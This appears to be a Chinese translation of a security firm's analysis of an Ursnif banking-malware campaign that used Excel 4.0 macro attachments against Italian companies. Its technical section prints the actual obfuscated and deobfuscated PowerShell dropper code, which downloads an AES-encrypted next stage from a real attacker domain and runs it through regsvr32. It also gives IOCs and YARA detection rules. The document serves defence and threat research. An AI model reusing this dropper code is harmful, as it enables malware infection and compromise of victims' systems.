10

Ursnif针对意大利公司的新攻击

 4 years ago
source link: https://www.freebuf.com/articles/others-articles/234275.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

介绍

Ursnif 是十分活跃的威胁之一,通常针对意大利和欧洲多个行业发起垃圾邮件攻击。

最近,发现了一种针对意大利公司的新 Ursnif 变种。垃圾邮件使用 Avviso di Pagamento_xxxx_date 为标题的附件(xxxx 是数字,date 是 dd-mm-yyyy 格式的日期),比如 Avviso di Pagamento_14326_15_04_2020。我们发现本轮攻击中 Ursnif/ISFB Dropper 使用技术发生了重大的变化,采用了新技术来避免检测,并且对 Ursnif 感染链进行了重大的升级改变。

技术分析

与 Ursnif 恶意软件家族的其他样本相比,本次针对意大利公司使用的样本包含一些重要的升级,而且攻击链有着显著的变化。首先 Dropper 使用 Excel 4.0 宏(XLM 宏)降低反病毒引擎的检出率,随后使用两个不同的 C&C,其中一个 C&C 服务器仅用于记录失陷主机的 UUID 标识。

下图是本次 Ursnif 攻击行动的完整感染链:

6byaumE.jpg!web

旧宏代码

本次全新的 Ursnif 攻击行动是使用带有嵌入 XML 宏的恶意电子邮件附件展开的。以下是 Dropper 的静态信息:

哈希 5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394 威胁 Ursnif XLS 文档 Dropper 大小 39.0 KB (39936 字节) 文件类型 MS Excel 文档 简要描述 嵌入 XML 宏代码的 Ursnif XLS 文档 Dropper ssdeep Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq

打开文件,看起来就像是未填写的**。页面上有一个 Visualiz 按钮,诱使受害者点击触发感染。点击该按钮后,将启动旨在感染目标计算机的代码:

N7RJniM.jpg!web

该文件在结构上与过去的恶意样本相似,内容差别较大。安全告警显示文档中包含动态内容,经过深入检查后可以发现嵌入 EXCEL 4.0 宏(XML/XLF 宏)的存在。

BJ3yErU.jpg!web

动态内容是使用 Powershell 编写的,并且被拆分到多个单元格内,然后使用某些预置的处理程序进行评估:

VVnyai3.jpg!web

用户点击 Allow Content 可触发 Frame1_Layout 函数。最后会重新组装恶意宏代码,使得文档弹出一个窗口,通知用户文档已经损坏。当用户点击时,宏代码会终止 Excel 进程,但 Powershell 会继续在后台执行。

重新组装宏代码后,提取的宏代码是 Ursnif 的 Dropper:

sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3]+'X'-JoIN'') ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( 'ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tbL3ERZJSUmSJYqTfe/3+8syGPuDNkX5/GdN2OFeFKv3vktxm7VYiqHtpVXdN7Q+aHOPZ1Xde66+HRe13kNh7LO8TvSFit9YPwqUh1e5JePs/Zn7NdXEdY+vsHCOcHWzrCMvztE9L0/wOo/OZl/j8M5vk777PES+9ViqrhgrMnYHg**pMMqPTAulZEnmNtvMBsYB4vPbxhdA7C8QiIvTi5H3YuPpFveYFUOsS6ygX/uQICA8MJRf+L9YC2S4g/XipjR9Oi/gmHGRbOQd3tBehZc9nWr3PwwT+5VlCZsEIzt276aRcnjkBXyzkIXC/nHYKxb1vlpzRI53nBxbD6fQyHElw3IqnFchdCSKuOeRabkkzOQr8ohiXiRMyzxCEuC7/F4HgEJQ3h69eqx//49xHl6BzChlSE56IQLp5v8SifSBqKOFo51f3k+Da4H/rgd9DsWPGczZ4nI00vnwb+cvOWTclX6RdGadcPjMwoEuZsJ52s7voZuaz4IPhxazpvHyBJwS3W8IPUkRWbbGDrBdy3EH7jiLy7y269pNBoW8nHQ0c6bW0hAezol1mS0zfvvFg25a5D2SQm5fUNmvXqWEBqh6nR26RkxUPh3GUD78BbIjrJvs3Uc/cDXIh+lCN+1bpV+plFi20cNx3E9T/zZ27WZMrJ0FSajdGX3E7xVOknniWKVtb3343A2JEu00C/jKJa2vWdzNebCJiUCLEmq4mgiGX/H9wu5DKQWzZlU81nCiIQsew1Odet/YSdfhKPsJXrAYT6NU5Ow4+C3bvEwyzguX3TLwzaK8DR94RvDBxn0dz9pStVBEPV0y1yb0QPeVdDtaVZ6CtX9mHlEcjMigg5Ek7SAxHE6Hgdd3aJi6nk/TGJu1es0Du/lso42IYXoiS7yf5DdS7MEqdxb2lZdmYesXCU2wEJCmlAhDMzJJJgqnVBZQX9Xw2enQLH2vctKz/NIKoJ9Z4Du87HCoqZ8fwshP4Co7P0BF/uGEOsI0vC8T3ZFepXj3hu9ySL0kfkdMaptq551kZGzhZZxJkkx+YXe9SaUJJN8JnXrb3s79xP54kIkWlORI4TrGE2C**g6+wwbvDAGeGQOLBH2bpK/A29duqgcIfZ3Oxn1vTCKYaLtbHg3MSJL3h3VHoj1DSgIVWbS82yqTV3dBM+ml6m+efb1bXkolpnyGnxBosjnpfWUKHhoAWcv4YZ3sdMF1+VD1XxHU+FCKucbZUkcyUSZBF5ox+rIoD2SV9mm0ZCjRtQT2xvHr/uqt7L3OjPts9SmvmnkFZmxuL5UjASreGakHeG0HGZe2Qw0z1u357KZeC6oPFw9kHruavZR6waxu+ziNAFdGo5EDjIXMjwiAatbXfeJ9Dclcb3aZK/1qmBodbH8Ri8elkPHLXsMhwYFq1JnNrZIHdSwlc2FBua3CH3mhbIvpGL/SB5r4KPp6R5WaLLO0id50Cg7ZadSq6yGKpVMaGYKvci7Hla2ujnQ5Y8eJZVBHIe0nZ8V6d9JKtiJEUyQDBJqUNiIP2MXA+ZCT5MBFR5qjkkfEzj4urqq4FVcELb0JTEVY4CYGorTkEJ5ul1DN8+axgRbD1bOHetKngdp8FVa4rZaK7pe0WsMS5/Ql1Eo/wE=' ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } )

去混淆后,代码简化如下所示:

$lk64bE= [type]("{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}" -F 'RitH','OgrAP','URi','S','Ty.C','As','hY.H','YST','Em.sEc','M','HALgO','Rypt') ; &("{1}{0}"-f 'et','S') 1S7 ( [TyPe]("{3}{1}{2}{0}" -F 'eNCOdING','TeX','t.','SysTEM.') ) ; $9Sk2Z =[TyPE]("{1}{0}" -f 'egEx','r');${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}="MD5"){${Hh}=.('uu') ("{0}{1}{4}{5}{3}{2}" -f'S','ystem.Text.Stri','er','ld','n','gBui'); $lK64BE::("{2}{1}{0}" -f 'e','reat','C').Invoke(${GH})."cOMp`UTEhA`SH"( ( .("{0}{2}{3}{1}"-f'G','E','et-v','ArIaBL') 1S7 ).VAlUE::"uT`F8".("{1}{0}{2}"-f'etByt','G','es').Invoke(${H`Y}))|.('%'){[Void]${h`H}.("{0}{1}"-f'App','end').Invoke(${_}.("{0}{1}" -f'ToSt','ring').Invoke("x2"))};${HH}.("{0}{1}" -f 'ToS','tring').Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&("{1}{0}{2}"-f 'et-Rando','G','m') -Count 3|.('%'){[char]${_}})}while((&('th')(${U})) -notlike '*'+${e`e});return ${U}};${x`D}=("{2}{1}{0}" -f 't','adswif','uplo');${h`z}='ass';${Q}=2;${di}='pw';function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=''};${B`I}= $9SK2Z::("{1}{0}"-f 'eplace','r').Invoke(${t`Ik},'\d',${x`D});if(&("{2}{4}{1}{0}{3}" -f 'ecti','onn','T','on','est-C') (${BI}+${D`I}) -Count 1 -quiet){${bi}=''+'ht'+'tp'+("{1}{0}"-f'/','s:/')+${bi}+${dI}+'/'+${B`i}.("{1}{2}{0}"-f'ring','Sub','st').Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@(("{0}{1}"-f'new1','.'),'');function k`N{${LP}='2al'+(&('ht')(("{0}{1}" -f '*','6e1d')))+("{1}{0}" -f '.','ail')+(.('ht')(("{1}{0}"-f 'b','*95f')));return .('ts')(${Lp})};${X`q}=.('tS')(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&('Kn')};${y}=.('uu') ("{1}{0}{2}" -f'bC','Net.We','lient');${y}."He`AdeRs".("{1}{0}"-f'dd','A').Invoke(("{0}{1}{2}" -f 'Us','er-A','gent'), (("{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}"-f 'ozi','64; x64) AppleW','62','8.102 ','7.','36 (','it/5','0 (','H','Window','Saf','Ge','7','c','183','hrome/70.0.353','M','T','ari','3','ebK',' ','3','.36 Edge/','lla/','ML, ','ko) C','18.','/5','like','K','s NT 10.0; Win','5.')));${y}.("{4}{0}{3}{1}{2}"-f'own','stri','ng','load','D').Invoke(${Xq})|.( ([String]''."ReM`o`Ve")[45,12,27]-Join'')

Dropper 使用 base64 编码、字符串替换(多个 {} 序列)和字符串大写(大小写序列)。执行宏代码后,Dropper 将会连接 newuploadswift [.]pw 域名下载下一阶段的 Payload 并使用 Powershell 执行。

'fVcJb9pIFP4rUytb2wpYJD0UBaFdwpFlS6CtIVGXRjvGDODgg9gDCaXz3/d7tgOGRo0UH+N3fu9kugpd6UUhs5tT70kYJ9sBHyhzS/d5V9VGsZiJ5/vLS0PbnqttRW3PlFaeMl0sfb2kO67ANdZNqxOuowXxS6lK+vcJjnWzGgu5ikOGUz73lapOX9R9e2qlukSqy+MdqGpE4VrEMlMGTe8UqXyfqmTlqd6GTBl74Qx38fE9KY6CKyfBg31gAW+pguqOB8VvIfKM7IfxOlmeOLrJblcsFE/laPwgXFk92fq8W1e1E+NtZsB5akPqsD4Tsgy2jBQPTwEuHmTceeG78/8aUbBcSRHbm0SK4HMcTVauZGU3Pw6dQDCL/WR7yZlYW/iQR5Jzuf0xZJZbz0snnEDMEoBs2HDYaZqwz+H/PsK+bat3yy9liwefFU6n/GqqanB8omq5/ByxmZsbSaw/HtXPHQywIA0jxYlci52QvAt007S00OFBCwJiBBkRZpq1/aBONKi64Z+gqQgmg/ySfu2S1UtHzplhwJI6//FFWUVfGZHKiIKWRTCR+5iZ+MvByTAv5Fm5P36ggKfo3OF/LpBvbAuf/lOWtrS9hLv9Hh/UvVDEGlM/rUzM3kI/Y6ZUTcA6Xfl+GpCUsgCHHk7IwGvg8dXBQ0BOudEqlOwMsLRXfjfkdX4jtFP9u36aIt9Wp7ql7xO753W7aWZv+mlqL/iDqlmGfruCsE7fuhFBFG9sGQsnMEqUrEQIaAMeANoCZUbzVTgTEQPy3TmlWiySBNqs6x/eMpdFqv5RpdERReH5JpoIFJc24a1GH7kTt+xEA/I5Cuc7vELKClI8oJxoFeK0r6obfpOXVWUfXypFx4eZQfLI0DmSdfzuHL7ZfKhq+ipB5FlWIdXii2ULdxV7cmM14s1SRrPYWc43hyQD8Syry9XY91zm+k6SsPp0m78n0pG4jTdSjO5ZEPlG/rhYlPCREo75D+Y2P33wFqxGhc+Gg/ZFK3SjCSgM00Lgr0CSGCCu1gVUtOxOsPRFIEJSgfDWGM5hpnCkMDR810B5TGV9EhtQQs8r3ygK+NjwlkhkerFajatqJ/N8gDpMplEcsOP32q/G5GY0hZvSxvvwHDFbu6e2Fzr+lR+5**OwqZQAkdUV4UzOzap6FU4X2ZdjeARnrozwzlu31c46MrqzndJBi1ki4mPhuZgpUHw9Vrnw16OUCyfNxAb63yn4rfW/VUC+7xUovWrt8h3doo5sn0zKg81SUKOge1NMvdBLM+Vkm6wKAy9KPHSDG+rez/yLQvN4ROf4k7pIl6YOROv2GnIuwBlQZen2LV5lpcteaYseNbOQulpP0NW6E+MGKi8VQx3/1ok9Z+yLyyu2ax7GUbl2aKCKoEj9HfrQ6ta83h0KzdxZ1WTFBYBmizNpUo+UdGlGT6Ef6WY6jJo2+pgxysJ6T8qvScIVK986/kqg3dBZ1y6qbULnrcO7w5aGp06P3/YXQksJrztFwgsyrt7lZJy5y/e3hbAwvUcTqdvVTfTENp8kyizEYSH8NQLRzmdlNiTYyxyLkswJfB3Vp9kmslsbCPKpLG4akFKircGvK+twQdJX4zTXaLxmY+eFq1I6+2iSkiHlQrupDtpvNiZfRuQKl/EhL3EK3k55+Y45b9yYLeujhSxn6fM+sRAnKydL35P6Gx3n6xieUm+1XgqAJsRQ8vaFVkXHEI47h6N9xTxK6aivRpV7mmsRHw5U7S8jE05bExzalUc+TwdRY+7E9TimuYD/TXGUQMYvMXhqgepbGjmaijAAT9gNK1Uo92C6Lxl9sjSXR8NwoNF5R52e5iZJxU5rbORC670xomZ+T+QjYr5n5fFzFO9O63TcUX8QI+KnNfpD3hto96aipcq2X/CyNOxBCDF3KSOJOgXhVHujmYj+mn8FyazFB/Yg5h7vXWtkPcFjFuYl5BWycDZOV4NOEQBaTNdwf4FuUh15kTX1fLFbhncb4x0GpUgLl6Zt3fevNsWUDLChlQzrENYU1acU1gWhWFjszisVrHZUS97UONrsXC9NX1ofg4VC5WFS8Gv5t5bG4cPZubkVz54srgEwMCC7HqkjJsT4SRW6JjWOxCfzxRIUZx+owST+Lw7v1jdiwF5HIn2/SxsguV8/9HgBjw9wTH/LZD8LjHyrh4dpU51hv/4f'),

去混淆后,Powershell 变成如下所示:

function SDfiwe(${T`T}){${T`hL}=[regex]::("{2}{0}{1}"-f 'epl','ace','r').Invoke(${tt},'\d','');return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::("{0}{3}{2}{4}{1}" -f'F','tring','e64','romBas','S').Invoke(${t`E});return ${Ii}};&("{1}{0}"-f'l','sa') Vu new-object;${l`LA}=$(&("{0}{2}{3}{1}"-f'get-','object','wm','i') Win32_ComputerSystemProduct -computername . | &("{0}{2}{1}"-f'Select-','ject','Ob') -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&("{0}{1}" -f'gc','i') ${a`zq}|&("{1}{0}{2}"-f 'd','get-ran','om'))."na`mE" -replace ".{5}$";${M`K}=(&("{1}{0}"-f 'i','Gc') -path (((${A`zQ}.("{0}{2}{1}" -f 'to','ring','st').Invoke()))) | &("{2}{3}{0}{1}"-f 'e-Obj','ect','W','her') { ${_}."pSis`cON`TAiner" }|.("{2}{1}{0}"-f 'lect','e','s') fullname |.("{1}{0}{2}"-f'ndo','Get-Ra','m') -count 1)."FulLn`A`Me"+'\'+${f`BF}+'.';function NiLL(${T`yO}){${k`j}=.('Vu') IO.MemoryStream(,${t`yO});${m`m}=(.('Vu') IO.StreamReader(&('Vu') IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::"d`ECO`mPrESs"))).("{1}{2}{0}"-f 'nd','ReadT','oE').Invoke();return ${M`M}};&("{0}{1}" -f 's','al') msq regsv***;${S`U}='using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create("AES");AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}';.("{0}{1}"-f'A','dd-Type') -TypeDefinition ${su};function osi{${M}=${x`Q}+${q}+'?'+${L`LA};.('Sv') 8 ${m};&('SV') t0L ("{2}{3}{0}{1}"-f 'ie','nt','Net','.WebCl');.('Si') Variable:B (&('Vu') (&("{0}{1}" -f 'I','tem') Variable:\t0L)."v`ALUe");.('Sv') D ("{2}{0}{1}" -f'adDa','ta','Downlo');${f`DS}=(([byte[]](&('Gv') B -Value).((&('LS') Variable:D)."Va`LUE")."IN`VOke"((&('GI') Variable:8)."vAL`Ue")));return &("{0}{1}"-f 'Ni','LL')(${F`ds})};function kelv{${Fd}=&("{1}{0}" -f 'i','os');${fd}=[Af]::("{1}{0}"-f'e','ft').Invoke(${Fd},${l`lA}.("{2}{0}{1}"-f'ubstrin','g','s').Invoke(0,16));${U}=${FD}.("{1}{2}{0}" -f 'tring','su','bs').Invoke(0,1);${e`F}=${F`D}.("{1}{0}"-f 'emove','r').Invoke(0,1);${O`O}=${e`F} -split'!';${vr}=[Text.Encoding]::"Ut`F8";foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.("{0}{1}{2}"-f'ToCharArr','a','y').Invoke();${o}=&("{1}{0}" -f 'wE','Y')(${O});for(${I}=0; ${i} -lt ${O}."c`oUnT"; ${I}++){${o`Ut} += [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}."COU`NT"])}};${SS}=${e`F}."rep`lA`ce"((${o`O}[0]+"!"),${v`R}."gE`TSTr`i`NG"(${O`UT}));return ${SS}};function gb{${k`I}=&("{1}{0}"-f'lv','ke');[io.file]::("{0}{2}{1}"-f'Write','tes','AllBy').Invoke(${m`K},(.("{1}{0}" -f 'E','Yw')(${ki} -replace ".{200}$")));if((&("{1}{0}"-f 'ci','g') ${mk})."Len`GtH" -lt 512){exit};&("{0}{1}"-f'ms','q') -s ${mK};.("{0}{1}" -f'sle','ep') 15;.('sl');[io.file]::("{2}{1}{0}" -f'ines','llL','WriteA').Invoke(${m`k},(&("{1}{0}"-f'Dfiwe','S')(${l`LA})))};&('gb')

在此处,恶意软件使用了一个特殊的技巧保证唯一感染。在前面的代码段中,已经看见了该计算机的 UUID 创建,该 UUID 值被作为 GET 请求的参数。如果第二次使用相同的 UUID 发送 GET 请求,服务器将返回一个空响应。而如果 UUID 被第一次发送给服务器,将返回感染的下一阶段。

2meaUrE.jpg!web

如上所示,响应体已经被加密了。由上面代码中显示的 AES 解密代码解密,随后通过 regsrv32.exe 进程执行。

Loader

Payload 如下所示:

哈希 e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0 威胁 Ursnif Loader 大小 289.50KB(296448 字节) 文件类型 DLL 简要描述 能够注入内存的 Ursnif Loader ssdeep 6144:ydLG0cc+HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu+a:y5GjsEzaKG4XcLs3isu+a imphash f11ff0b8c499af0d98f00299b97339cf

该组件是 Ursnif 的 Payload 的加载程序,写入注册表 HKCU\Software\AppDataLow\Software\Microsoft\Microsoft\[RANDOMID] 作为持久化机制。

aaqmEnY.jpg!web

和经典的 Ursnif 恶意软件感染类似,该样本也会将配置字符串以 base64 编码并使用 Serpent 算法加密发送到 C&C 服务器。两种方法可以检索配置字符串:

第一种是使用进程内存中的密钥解密发送到 C&C 服务器的请求

第二种是在进程中查找配置字符串

Ursnif 本次攻击行动的配置如下所示:

k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.*

结论

通过持续的跟踪分析,可以发现 Ursnif 的 TTP 在随着时间改变,恶意软件在规避检测与反分析上的技术正在迅速发展。

本次针对意大利公司的攻击在保持基本特征和功能不变的前提下,使用 XLM 宏来降低反病毒引擎的检出率,并使用两个不同的 C&C 服务器。其中一个 C&C 服务器只接受 UUID 跟踪失陷主机,该机制可以更好地跟踪恶意软件的感染情况。

IOC

5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394E32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0newuploadswift[.pwyefgweoiuhf[.xyzHKCU\Software\AppDataLow\Software\Microsoft\Microsoft[RANDOMID]

Yara 

rule loaderXLS_Ursnif_Italy_April_2020 {
meta:
      description = "Yara rule for Ursnif XLS loader - April Italian Campaign"
      hash = "5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394"
      author = "Cybaze - Yoroi  ZLab"
      last_updated = "2020-04-16"
      tlp = "white"
      category = "informational"
strings:
    $s1 = "powershellB"
    $s2 = {73 61 70 73 20 50 6F 77 65 72 53 68 65 6C 6C 20 2D 61 72 67 20 27 73 61 6C 20 75 75 20 4E 65 77 2D 4F 62 6A 65 63 74 3B 20 26 7B 28 7D 20 7B 28 7D 7B 5B 7D 73 74 52 49 4E 47 7B 5D 7D 24 56 45 72 42 6F 53 65 50 52 65 66 45 72 45 4E 63 65 7B 29 7D 7B 5B 7D 31 2C 33 7B 5D 7D 7B 2B 7D 27 27 58 27 27 2D 4A 6F 49 4E 27 27 27 27 7B 29 7D 20 7B 28 7D 20 75 75 20 69 6F 2E 63 6F 6D 70 52 45 53 53 69 4F 4E 2E 64 65 66 4C 61 54 45 73 74 72 45 61 4D 7B 28 7D 7B 5B 7D 73 79 73 74 65 6D 2E 49 6F 2E 6D 65 4D 6F 52 79 73 54 72 45 61 4D 7B 5D 7D 20 7B 5B 7D 63 6F 6E 56 65 72 54 7B 5D 7D 3A 3A 46 52 4F 4D 62 41 53 45 36 34 53 74 72 69 4E 47 7B 28 7D 20 27 27 5A 56 55 4C 55 39 70 4B 46 50 34 72 4F 78 6D 75 6D 36 30 51 53 58 68 70 47 57 59 75 61 6C 6F 6F 50 6C 72 42 31 74 62}
    $s3 = {FF 09 01 17 FC 00 4C 33 45 52 5A 4A 53 55 6D 53 4A 59 71 54 66 65 2F 33 7B 2B 7D 38 73 79 47 50 75 44 4E 6B 58 35 2F 47 64 4E 32 4F 46 65 46 4B 76 33 76 6B 74 78 6D 37 56 59 69 71 48 74 70 56 58 64 4E 37 51 7B 2B 7D 61 48 4F 50 5A 31 58 64 65 36 36 7B 2B 7D 48 52 65 31 33 6B 4E 68 37 4C 4F 38 54 76 53 46 69 74 39 59 50 77 71 55 68 31 65 35 4A 65 50 73 2F 5A 6E 37 4E 64 58 45 64 59 7B 2B 7D 76 73 48 43 4F 63 48 57 7A 72 43 4D 76 7A 74 45 39 4C 30 2F 77 4F 6F 2F 4F 5A 6C 2F 6A 38 4D 35 76 6B 37 37 37 50 45 53 7B 2B 7D 39 56 69 71 72 68 67 72 4D 6E 59 48 67 43 34 70 4D 4D 71 50 54 41 75 6C 5A 45 6E 6D 4E 74 76 4D 42 73 59 42 34 76 50 62 78 68 64 41 37 43 38 51 69 49 76 54 69 35 48 33 59 75 50 70 46 76 65 59 46 55 4F 73 53 36 79 67 58 2F 75 51 49 43 41 38 4D 4A}
    $s4 = {2B 7D 4C 39 59 43 32 53 34 67 2F 58 69 70 6A 52 39 4F 69 2F 67 6D 48 47 52 62 4F 51 64 33 74 42 65 68 5A 63 39 6E 57 72 33 50 77 77 54 7B 2B 7D 35 56 6C 43 5A 73 45 49 7A 74 32 37 36 61 52 63 6E 6A 6B 42 58 79 7A 6B 49 58 43 2F 6E 48 59 4B 78 62 31 76 6C 70 7A 52 49 35 33 6E 42 78 62 44 36 66 51 79 48 45 6C 77 33 49 71 6E 46 63 68 64 43 53 4B 75 4F 65 52 61 62 6B 6B 7A 4F 51 72 38 6F 68 69 58 69 52 4D 79 7A 78 43 45 75 43 37 2F 46 34 48 67 45 4A 51 33 68 36 39 65 71 78 2F 2F 34 39 78 48 6C 36 42 7A 43 68 6C 53 45 35 36 49 51 4C 70 35 76 38 53 69 66 53 42 71 4B 4F 46 6F 35 31 66 33 6B 7B 2B 7D 44 61 34 48 2F 72 67 64 39 44 73 57 50 47 63 7A 5A 34 6E 49 30 30 76 6E 77 62 7B 2B 7D 63 76 4F 57 54 63 6C 58 36 52 64 47 61 64 63 50 6A 4D 77 6F 45 75 5A 73 4A }
    $s5 = {54 2E 45 6E 43 4F 44 69 6E 67 7B 5D 7D 3A 3A 41 73 43 49 69 20 7B 29 7D 20 7B 7D 7D 20 7C 46 6F 52 65 41 43 68 2D 4F 42 6A 65 63 54 7B 7B 7D 24 5F 2E 52 45 41 44 54 4F 45 6E 44 7B 28 7D 7B 29 7D 20 7B 7D 7D 20 7B 29 7D 27 20 2D 57 69 6E 20 30 31 3B 63 6C 65 61 72 3B 65 78 69 74 7E 7B 4E 55 4D 4C 4F 43 4B 7D
}
    $s6 = {20 69 6D 70 6F 73 73 69 62 69 6C 65 20 63 61 72 69 63 61 72 6C 6F 2E
}
condition:
    $s1 and (1 of ($s2,$s3,$s4,$s5)) and $s6
}
import "pe"
rule payload_DLL_Ursnif_March_2020 {
meta:
      description = "Yara rule for Ursnif payload - April Italian Campaign"
      hash = "E32C592819D825851BAE84A33BF5FA1A26E0A57A14C0E4B8C3E845C1117998A0"
      author = "Cybaze - Yoroi  ZLab"
      last_updated = "2020-04-17"
      tlp = "white"
      category = "informational"
strings:
    $b1 = "c:\\Above\\Industry\\Fear\\ring\\charge\\large\\set\\EarthAgainst.pdb" ascii wide
    $b2 = {00 2E 3F 41 56 72 75 6E 74 69 6D 65 5F 65 72 72 6F 72 40 73 74 64 40 40}
    $b3 = {41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A}
    $b4 = {65 00 6E 00 2D 00 ?? 00 ?? 00 00 00}
    $b5 = "A-C0F2E0B9FA8E}\\hide.me VPN\\Hide.me.exe" ascii wide
Condition:
    uint16(0) == 0x5A4D and pe.number_of_sections == 5 and  pe.imphash()=="f11ff0b8c499af0d98f00299b97339cf" and any of them
}

*参考来源: Yoroi ,FB 小编 Avenger 编译,转载请注明来自 FreeBuf.COM


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK